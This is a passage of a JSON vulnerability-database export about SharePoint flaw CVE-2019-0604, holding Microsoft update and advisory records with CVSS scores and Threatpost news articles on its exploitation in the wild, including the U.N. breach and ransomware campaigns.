"https://support.microsoft.com/en-us/help/4462143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:02", "description": "None\n## Summary\n\nThis security update resolves vulnerabilities in Microsoft Office that could allow remote code execution if a user opens a specially crafted Office file. To learn more about these vulnerabilities, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0594>), [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), and [Microsoft Common Vulnerabilities and Exposures CVE-2019-0668](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0668>). \n \n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Enterprise Server 2016 installed.This public update delivers Feature Pack 2 for SharePoint Server 2016. Feature Pack 2 contains the following feature:\n\n * SharePoint Framework (SPFx)\nThis public update also delivers all the features that were included in Feature Pack 1 for SharePoint Server 2016, including:\n * Administrative Actions Logging\n * MinRole enhancements\n * SharePoint Custom Tiles\n * Hybrid Auditing (preview)\n * Hybrid Taxonomy\n * OneDrive API for SharePoint on-premises\n * OneDrive for Business modern experience (available to Software Assurance customers)\nThe OneDrive for Business modern user experience requires an active Software Assurance contract at the time that the experience is enabled, either by installation of the public update or by manual enablement. If you don't have an active Software Assurance contract at the time of enablement, you must turn off the OneDrive for Business modern user experience.For more information, see the following Microsoft Docs articles:\n * [New features included in the November 2016 Public Update for SharePoint Server 2016 (Feature Pack 1)](<https://go.microsoft.com/fwlink/?linkid=832679>)\n * [New features included in the September 2017 Public Update for SharePoint Server 2016 (Feature Pack 2)](<https://go.microsoft.com/fwlink/?linkid=856819>)\n\n## Improvements and fixes\n\nThis security update contains the following improvement in SharePoint Server 2016:\n\n * This update makes improvements to enable the new Japanese era in SharePoint Server 2016 when it is available.\nThis security update contains the following improvement in Project Server 2016:\n * This update adds support in the client-side object model (CSOM) for setting the EnterpriseProjectType of a project by using the REpresentational State Transfer (REST) Application Programming Interface (API)..\nThis security update contains fixes for the following nonsecurity issues in SharePoint Server 2016:\n * Assigned Badges icons are unexpectedly hidden in a discussions list, a Members list and the My Membership web part in a SharePoint community site.\n * When you try to add a SharePoint hosted app in a SharePoint Online site, the app is not displayed on the **App from your organization** page.\n * When you run a search query, the alternate access mapping function is always called. This call is expensive and may lead to a high CPU load on the server.\n * When you run a search query by using the REST interface that contains the **SortList** query parameter, the query may fail with a **SearchServiceException** exception because the **SortList** parameter is case-sensitive.\n\n## Known issues in this security update\n\nAfter this update is installed, search queries that are executed from a nondefault zone URL (an extended zone) don't return any results. To resolve this issue, install [February 27, 2019, update for SharePoint Enterprise Server 2016 (KB3085363)](<https://support.microsoft.com/help/3085363>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the stand-alone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462155>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the stand-alone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update KB 4462155 for the 64-bit version of SharePoint Server 2016](<http://www.microsoft.com/download/details.aspx?familyid=2a51ab39-b043-4c60-b567-f0d89bff4603>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: February 12, 2019](<https://support.microsoft.com/en-us/help/20190212>).\n\n### Security update replacement information\n\nThis security update replaces the previously released security update [KB 4461598](<https://support.microsoft.com/help/4461598>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2016-kb4462155-fullfile-x64-glb.exe| 7DC5AA3680BA19E921B99E95796468700F08E8A1| 148CB24E09D60DEB7A3394E3648BEC546CEB7855F296C1A542FE5BED92B2BF98 \n \nFile informationDownload the [list of files that are included in security update KB 4462155](<http://download.microsoft.com/download/1/1/A/11ABDD3A-B6B3-4FD2-91EB-90A1525BA7EF/4462155.csv>).\n\n## How to get help and support for this security update\n\nHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-27T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2016: February 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604", "CVE-2019-0668"], "modified": "2019-02-27T00:00:00", "id": "KB4462155", "href": "https://support.microsoft.com/en-us/help/4462155", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:07", "description": "A remote code execution vulnerability exists in Microsoft SharePoint. A remote attacker can exploit this vulnerability to execute arbitrary code via a specially crafted package on the vulnerable server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-03-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft SharePoint Remote Code Execution (CVE-2019-0604)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2020-03-01T00:00:00", "id": "CPAI-2019-0392", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-12-07T16:19:20", "description": "A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the SharePoint application pool and the SharePoint server farm account.\n\nExploitation of this vulnerability requires that a user uploads a specially crafted SharePoint application package to an affected version of SharePoint.\n\nThe security update addresses the vulnerability by correcting how SharePoint checks the source markup of application packages.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T08:00:00", "type": "mscve", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-04-25T07:00:00", "id": "MS:CVE-2019-0604", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2023-12-07T16:23:15", "description": "Microsoft SharePoint fails to check the source markup of an application package. An attacker who successfully exploits the vulnerability could run remote code in the context of the SharePoint application pool and the SharePoint server farm account.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft SharePoint Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-0604", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2020-04-11T11:47:28", "description": "A recently patched, high-severity vulnerability in Microsoft SharePoint (CVE-2019-0604) that allows remote code-execution is being increasingly exploited in the wild, according to researchers \u2013 possibly by the FIN7 group, among others.\n\nAccording to the [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>), the vulnerability (which carries a 7.8 CVSS v.3.0 score) exists because the software fails to check the source markup of an application package \u2013 Microsoft issued a patch in March.\n\nThe Canadian Cyber Security Centre in April [warned](<https://cyber.gc.ca/en/alerts/china-chopper-malware-affecting-sharepoint-servers>) that the bug is being exploited in Canada, using \u201cthe tiny China Chopper web-shell to gain an initial foothold.\u201d But efforts appear to be escalating. A [report](<https://www.ncsc.gov.sa/wps/portal/ncsc/home/Alerts/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDQ1dLDyM3A18_M29XQwcnQKD3UyN3Y0dfQ30w8EKDDxNTDwMTYy8_YMMDAwcjcM8PIwtnA0N3I31o4jRj0cBSL8BDuAI0h8FUYLLBUYwBbjNKMgNjTDIdFQEAHmubTA!/dz/d5/L2dBISEvZ0FBIS9nQSEh/>) Friday from the Saudi Cyber Security Centre (NCA) warned of attacks happening across the Kingdom, also using the one-line China Chopper.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cIn the last two weeks, NCA has observed evidence of multiple organizations that have been impacted and infected by the active exploitation of the CVE-2019-0604, a vulnerability that can grant remote code execution were the threat actors exploits this vulnerability and use the Command Prompt to implant the known China Chopper web-shell,\u201d the NCA said. \u201cThe threat actors through the vulnerability runs the command prompt and writes the\u2026web-shell in all available folders in the SharePoint server.\u201d\n\nFrom there, the attackers utilize the web-shell to install other PowerShell scripts to move laterally and begin internal reconnaissance in the victim network. Second-stage payloads include a \u201cnew, custom backdoor,\u201d according to the NCA.\n\nFollowing on this, AT&amp;T Alien Labs has also identified additional attacks that exploit the bug, dropping a second-stage binary related to those attacks. The malicious code can carry out remote code-execution, data exfiltration and downloads of more malware.\n\n\u201c[One] malware sample was shared by a target in China,\u201d Chris Doman, researcher at Alien Labs, said in [a posting](<https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild/>) on Friday. \u201c[It] is likely an earlier version of the second-stage malware deployed in the Saudi intrusions.\u201d\n\nIn looking at the Saudi attacks, \u201cthe attackers are reasonably capable,\u201d Doman added via email. \u201cThe malware waits for encrypted commands from an attacker \u2013 rather than noisily reaching out to an attacker\u2019s command-and-control server. And they haven\u2019t left any obvious indicators of their location in the malware or servers. The Saudi report mentioned the attackers looking for Exchange and SQL servers \u2013 that would fit with attackers looking for information.\u201d\n\nDoman also said that Alien Labs believes there are multiple attackers now using exploiting the vulnerability \u2013 including potentially the FIN7 cybercrime gang. Since 2015, FIN7 has targeted point-of-sale systems at casual-dining restaurants, casinos and hotels. The group [typically uses](<https://threatpost.com/fin7-hitting-restaurants-with-fileless-malware/126213/>) malware-laced phishing attacks against victims in hopes they will be able to infiltrate systems to steal bank-card data and sell it. Its choice of malware is always evolving, including occasionally using [never-before-seen samples](<https://threatpost.com/fin7-ramps-up-campaigns-with-two-fresh-malware-samples/142975/>) that surprise researchers.\n\nDoman explained the SharePoint attacks\u2019 connection to the group: \u201cOne user on Twitter has reported that they have seen exploitation from the IP address 194.36.189[.]177 \u2013 which we have also seen acting as a command-and-control server for malware linked to FIN7.\u201d\n\nDoman added via e-mail that while there might be multiple attackers, the exploit itself isn\u2019t particularly widely used at this point.\n\n\u201cRecent server-side vulnerabilities like the [Atlassian Confluence](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>) vulnerability and [Oracle Weblogic vulnerabilities](<https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/>) are being exploited very widely by a number of groups, for cryptomining and ransomware gangs,\u201d he said. \u201cIn contrast, I\u2019ve seen few reports of this SharePoint vulnerability being exploited so far,\u201d including \u201ca couple of Twitter users in the U.S.\u201d\n\nThe Saudis warned that they expect snowballing attacks however in the short term: \u201cThreat actors with varying motivations are often quick to weaponize PoC code following public disclosures. This swift exploitation ultimately increases the likelihood that their campaigns will be successful. Therefore, it is critical that organizations with a SharePoint installation should apply the published security updates.\u201d\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _[_our Threatpost webinar on May 29 at 2 p.m. ET_](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices _**\n", "cvss3": {}, "published": "2019-05-10T21:29:27", "type": "threatpost", "title": "FIN7 Linked to Escalating Active Exploits for Microsoft SharePoint Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604"], "modified": "2019-05-10T21:29:27", "id": "THREATPOST:157F244C629A1657480AFA561FF77BE4", "href": "https://threatpost.com/fin7-active-exploits-sharepoint/144628/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-16T23:29:10", "description": "Hackers breached the United Nations network in July by exploiting a Microsoft SharePoint vulnerability, according to reports. The breach, which appears to be an espionage operation, reportedly gave the hackers access to an estimated 400 GB of sensitive data.\n\nThe breach was swept under the rug by the U.N. until this week, when an internal document outlining the hack was [leaked by The New Humanitarian](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), a global news agency focusing on human rights stories. According to the confidential document, at least 42 U.N. servers were compromised in Geneva and Vienna, potentially exposing staff personnel data and sensitive documents for other organizations collaborating with the U.N.\n\n\u201cAlthough it is unclear what documents and data the hackers obtained in the 2019 incident, the report\u2026 implies that internal documents, databases, emails, commercial information and personal data may have been available to the intruders \u2013 sensitive data that could have far-reaching repercussions for staff, individuals and organisations communicating with and doing business with the U.N.,\u201d Ben Parker, with The New Humanitarian, said on Wednesday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAccording to [the Associated Press](<https://apnews.com/0d958e15d7f5081dd612f07482f48b73>), which also viewed the internal document, the breach stemmed from an exploit of a flaw in Microsoft\u2019s SharePoint software. This remote code-execution vulnerability ([CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>)) was patched in March \u2014 however, the U.N. reportedly did not update its systems.\n\n## The Hack\n\nServers in three separate locations were compromised: the U.N. office at Vienna; the U.N. office at Geneva; and the U.N. Office of the High Commissioner for Human Rights (OHCHR) headquarters, also in Geneva.\n\nWhile the specific data that was compromised is unclear, the document implies that staff records, health insurance and commercial contract data were compromised. The hack also impacted the U.N. human rights office, which collects data that\u2019s used for exposing human rights abuses. The document also reportedly suggests the hack most seriously affected the U.N.\u2019s office in Geneva, which includes 1,600 staff working in a range of political and development units, including those focused on Syrian peace talks, the humanitarian coordination office (OCHA) and the Economic Commission for Europe.\n\nIn a statement sent to Threatpost, the U.N. said that no sensitive data was accessed in the data breach. It said that once it became aware of the attack, it took action to shut down the affected development servers.\n\n\u201cAlthough hackers accessed a self-contained part of our system in July 2019, the development servers they accessed did not hold any sensitive data or confidential information,\u201d according to the U.N.\u2019s statement. \u201cThe hackers did manage to access our Active User Directory, which contains the user IDs for our staff and devices. However, they did not succeed in accessing passwords. Nor did they gain access to other parts of the system.\u201d\n\nThe type of malware utilized, and the command and control (C2) servers used to exfiltrate data, is unknown. The identity of the hackers, as well as the extent of the data collected, is also unknown. However, the security experts that Threatpost talked to said that the attack was likely launched by a sophisticated threat actor.\n\n\u201cGiven the fact that it would be so heavily targeted, it is unfortunate that the U.N. appears to not have the basic security hygiene in place to ward off commodity threats, let alone state-backed actors,\u201d said Richard Gold, head of security engineering at Digital Shadows. \u201cHaving confidence that you have fully evicted a threat group from a network is hard to come by, especially when the fundamentals of network security are not in place.\u201d\n\n## Lack of Alert\n\nSenior U.N. officials did not notify anyone \u2013 even their own staff \u2013 about the breach. U.N. staff members were only asked to change their passwords.\n\nWhile most organizations are held to regulatory standards that require them to disclose data breaches, [like the GDPR](<https://threatpost.com/data-breach-fines-consumer-safety/149956/>), the UN has [diplomatic immunity](<https://legal.un.org/avl/ha/vcdr/vcdr.html>), meaning that it is not obliged to divulge what was obtained by the hackers or notify those affected.\n\nHowever, security experts like Kevin Beaumont are decrying the agency\u2019s secrecy around the data breach.\n\n\u201cI don\u2019t know what the culture is at the U.N., but they probably need to pivot to more transparency for cybersecurity, this would have been a non-story and benefit to all if they had been open about the issue,\u201d said Beaumont on Twitter.\n\n> I don\u2019t know what the culture is at the UN but they probably need to pivot to more transparency for cybersecurity, this would have been a nonstory and benefit to all if they had been open about the issue.\n> \n> \u2014 Kevin Beaumont (@GossiTheDog) [January 30, 2020](<https://twitter.com/GossiTheDog/status/1222800076755607552?ref_src=twsrc%5Etfw>)\n\nThe New Humanitarian said that the decision not to notify impacted parties \u2013 even its own staff personnel \u2013 marks a \u201cbreach of trust\u201d for all involved.\n\n\u201cNo matter what exactly was exposed, the decision not to notify all the people or organizations whose data may have been compromised \u2013 including U.N. staff \u2013 risks damaging trust in the U.N. as an institution, and so its effectiveness, according to human rights and privacy analysts.\u201d\n\nThe U.N. is constantly being targeted by cybercriminals. For instance, in October, researchers said that a [mobile-focused phishing campaign](<https://threatpost.com/un-unicef-red-cross-mobile-attack/149556/>) was targeting the body. And earlier this month, researchers said that the [operators behind Emotet](<https://threatpost.com/un-weathers-emotet-trickbot-malware/151894/>) had taken aim at U.N. personnel in a targeted attack.\n\n\u201cThe news that the United Nations was the victim of an advanced persistent threat (APT), likely state-sponsored, for the purposes of espionage, is not all that surprising,\u201d Rui Lopes, engineering and technical support director at Panda Security, told Threatpost. \u201cThe U.N. maintains critical data at a global scale that multiple states and organizations would like to have their hands on, and this level of sophistication is indicative of that purpose.\u201d\n", "cvss3": {}, "published": "2020-01-30T16:02:58", "type": "threatpost", "title": "U.N. Hack Stemmed From Microsoft SharePoint Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604"], "modified": "2020-01-30T16:02:58", "id": "THREATPOST:88C99763683E42B94F1E7D307C0D9904", "href": "https://threatpost.com/un-hack-microsoft-sharepoint-flaw/152378/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-30T15:28:39", "description": "A phishing campaign, discovered by researchers at [Cofense](<https://cofense.com/blog/sharing-documents-sharepoint/>), is draping itself in a Microsoft Office SharePoint theme and successfully bypassing security email gateways (SEGs). In a post on Tuesday, the firm said that this is an example of why it\u2019s not always prudent to share documents via Microsoft\u2019s hugely popular, widely used SharePoint collaboration platform. \n\nThe phish is targeting Office 365 users with a legitimate-looking SharePoint document that claims to urgently need an email signature. The campaign cropped up in a spot that\u2019s supposed to be protected by Microsoft\u2019s own SEG. This isn\u2019t the first time that we\u2019ve seen the SEG sanctuary get polluted:: In December, [spearphishers spoofed Microsoft.com](<https://threatpost.com/spearphishing-attack-spoofs-microsoft-office-365/162001/>) itself to target 200 million Office 365 users, successfully slipping past SEG controls due to Microsoft\u2019s reported failure to enforce domain-based message authentication, reporting &amp; conformance (DMARC): an email authentication protocol built specifically to stop exact domain spoofing (SPF/DKIM).\n\n## \u2018Response Urgently\u2026?\u2019\n\nAs this image of the text in the phishing email shows, the spelling and grammar used in the boobytrapped message aren\u2019t the most egregious, atrociously spelled, syntactically bizarre giveaways you can find in these kinds of phishing campaigns. But then again, it\u2019s probably safe to assume that any SharePoint message that asks you to \u201cresponse urgently\u201d isn\u2019t coming from a native speaker. \n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/28141946/cofense-image-1.png>)\n\nClick Image to Enlarge\n\nThe mere fact that the message presses urgency on its recipients should be a tip-off, of course: \u201cRush-rush\u201d is a typical phishing ploy. Cofense notes that other red flags include the fact that the user\u2019s name isn\u2019t apparent in the opening message: an indication that it\u2019s a mass-distribution campaign intended to reach many targets.\n\nAs well, when recipients hover over the hyperlink, they\u2019ll see hide nor hair of any reference to Microsoft. Those who click on the link will instead be shuffled over to the landing page shown below, which display\u2019s Microsoft\u2019s SharePoint logo and the \u201cPending file\u201d notification in front of a blurry background and a request for the intended victim to log in to view the document. That \u201ccould suffice for threat actors to extract and harvest users\u2019 personal data,\u201d Cofense says. If and when credentials are handed over, the campaign redirects the user to a spoofed, unrelated document, \u201cwhich might be enough to trick the user into thinking this is a legitimate transaction,\u201d Cofense says. \n\nIn its [X-Force Threat Activity Report](<https://exchange.xforce.ibmcloud.com/threats/guid:2ba40d9807d0d73b9dc805bdce16ce79>), IBM labelled the phish a high-risk threat and gave these recommendations:\n\n * Ensure anti-virus software and associated files are up to date.\n * Search for existing signs of the indicated incidents of compromise (IoCs) in your environment.\n * Consider blocking and/or setting up detection for all URL and IP based IoCs.\n * Keep applications and operating systems running at the current released patch level.\n * Exercise caution with attachments and links in emails.\n\n\n\nClick Image to Enlarge\n\nThough it\u2019s high risk, this phishing campaign is basically just another story of a malicious actor putting up bogus material that looks legitimate in order to lure users into clicking, in the hopes of obtaining credentials. Don\u2019t shrug it off, though: it\u2019s yet another attack against SharePoint servers, which have now joined the roster of network devices \u2013 including much-bedeviled [Microsoft Exchange email servers](<https://threatpost.com/chase-bank-phish-sexchange-email-protections/165653/>), [SonicWall gateways](<https://threatpost.com/sonicwall-breach-zero-days-in-remote-access/163290/>) and [Pulse Secure gateways](<https://threatpost.com/pulse-secure-critical-zero-day-active-exploit/165523/>) \u2013 that are being used by ransomware gangs to jimmy open enterprise networks. \n\nWhich brings us to ransomware: the second slap in the double-SharePoint whammy: \n\n## Ransomware Gang Pings the Pain Via Wickr\n\nIt\u2019s a fairly new variant, first spotted in January by [Pondurance](<https://www.pondurance.com/blog/new-ransomware-variant-hello-ransomware/>). Analysts are calling it two names: Hello, since some samples use .hello as an extension; or WickrMe, since the gang that\u2019s pushing it are using the Wickr encrypted instant messaging service to try to shake down victims for ransom. \n\nThe attackers are using a dusty Microsoft SharePoint 2019 vulnerability ([CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-0604>)) to pry their way into victims\u2019 networks. From there, they\u2019re using Cobalt Strike to pivot to the domain controller and launch ransomware attacks. \n\nCVE-2019-0604 is a high-severity CVE that can lead to remote code-execution. Microsoft [patched](<https://threatpost.com/fin7-active-exploits-sharepoint/144628/>) the flaw in March 2019, but nonetheless, there seems to be no end to the attacks that have used it to penetrate unpatched servers since then. One example: Microsoft warned in October 2020 that Iranian nation-state actors were using CVE-2019-0604 to exploit remotely unpatched servers and to then implant a web shell to gain persistent access and code execution. Following the web shell installation, an attacker deploys [Cobalt Strike](<https://threatpost.com/cobalt-ulster-strikes-again-with-new-forelord-malware/153418/>) \u2013 a commercially available penetration-testing tool that they later use to install a backdoor that lets them run automated PowerShell script, which eventually download and install the final payload: the Hello/Wickr ransomware.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nJeff Costlow, CISO of ExtraHop, told Threatpost on Wednesday that the ransomware attacks against the 2019 vulnerability affecting SharePoint servers are the more insidious threat in the double whammy, in that they install remote control software and thus allow direct access to the infrastructure where attackers can freely frolic. \n\n\u201cThe common thread is the SharePoint server,\u201d Costlow said in an email. \u201cAnyone using SharePoint needs to ensure that they are patching any instances of SharePoint to avoid the malware/ransomware installations. Long term, no amount of patching will solve the phishing problem. It\u2019s too easy for attackers to build sites that mimic legitimate sites. We need to rethink how sharing is done. Security teams need to take a proactive stance to help their users conduct business safely. There are various tactics to help alert users to possible attacks, such as setting up each SharePoint server to use a familiar background or image for users to ensure that they only input credentials on legitimate sites.\u201d\n\n## Two Separate SharePoint Jabs\n\nCofense told Threatpost in an email on Wednesday morning that there\u2019s no apparent connection between the SharePoint phishing campaign that its analysts uncovered and the Wickr/Hello ransomware gang\u2019s ongoing exploitation of SharePoint server vulnerabilities. \n\nBut one expert noted that there\u2019s a monotonous regularity in the pattern that these attacks follow: First we get the news about a vulnerability, then it gets jumped on by attackers looking for the sitting ducks of unpatched servers. \n\nIn an email to Threatpost on Wednesday, Avihai Ben-Yossef, CTO and co-founder of Cymulate, said that we\u2019ve seen this happen over and over. \u201cIn the last year, we see a repetitious pattern in such attacks. A zero-day is taken advantage of by a nation-state actor,\u201d he said. \u201cThe affected company \u2013 in this case, Microsoft \u2013 announces the vulnerability and subsequently patches it. Then other nation-state actors learning about the vulnerability subsequently launch attacks on those who have not patched. Finally, the criminal ransomware attackers come in, socialize the exploit on Dark Net sites and use it \u2026 to launch their own attacks. The double-SharePoint whammy is the fact that nation state actors used it first as a zero day (and then as a known vulnerability). Then ransomware actors came in and used it as well.\n\n\u201cThe idea is to know what kind of problems you have and where,\u201d he said. \u201cIf you don\u2019t know, you can\u2019t protect yourself. Organizations must develop a better response capability to track these announcements and threat intelligence and patch quicker.\u201d \n\n**Join Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS &amp; Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d \u2013 a LIVE roundtable event on[ Wed, May 12 at 2:00 PM EDT](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>). Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free.**\n", "cvss3": {}, "published": "2021-04-28T19:00:55", "type": "threatpost", "title": "Microsoft Office SharePoint Targeted With High-Risk Phish, Ransomware Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2021-23008"], "modified": "2021-04-28T19:00:55", "id": "THREATPOST:29D66B3C46A57CA3A0E13D7361812077", "href": "https://threatpost.com/sharepoint-phish-ransomware-attacks/165671/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state 